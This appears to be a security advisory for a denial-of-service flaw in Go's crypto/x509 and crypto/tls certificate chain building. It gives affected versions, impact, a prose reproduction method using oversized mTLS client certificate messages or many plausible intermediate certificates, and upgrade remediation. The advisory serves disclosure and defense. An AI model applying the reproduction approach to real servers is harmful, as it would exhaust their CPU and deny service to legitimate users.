Go Crypto/X.509 and Crypto/TLS Excessive Chain-Building Work Denial-of-Service Vulnerability

A denial-of-service vulnerability has been identified in the Go programming language's standard library, specifically within the crypto/x509 and crypto/tls packages. This issue arises during the certificate chain verification process, where the workload is not properly regulated. When a large number of intermediate certificates are supplied through VerifyOptions.Intermediates, the chain-building process can become excessively slow, leading to increased CPU usage and eventual failure. This vulnerability affects Go versions prior to 1.25.9, as well as versions 1.26.0 up to but not including 1.26.2.

Impact

Exploitation of this vulnerability causes a significant increase in CPU usage during certificate chain verification, leading to a denial-of-service condition. In TLS, this issue is exacerbated when a server is configured to verify client certificates, allowing the vulnerability to be exploited more readily.

Reproduction

The vulnerability can be reproduced by creating a TLS mTLS setup that includes a client certificate message just under the TLS certificate-message size limit. This setup should be configured to verify client certificates. Alternatively, the vulnerability can be reproduced by calling the x509.Certificate.Verify method with a pool of intermediate certificates that contains many distinct certificates, all of which appear to be plausible parents for the same child certificate. This can be done outside of TLS as well, depending on how much attacker-controlled certificate data an application accepts.

Remediation

Users can upgrade to Go versions 1.26.2 or 1.25.9, both of which include the necessary fix. Instructions for downloading these versions are available on the Go website.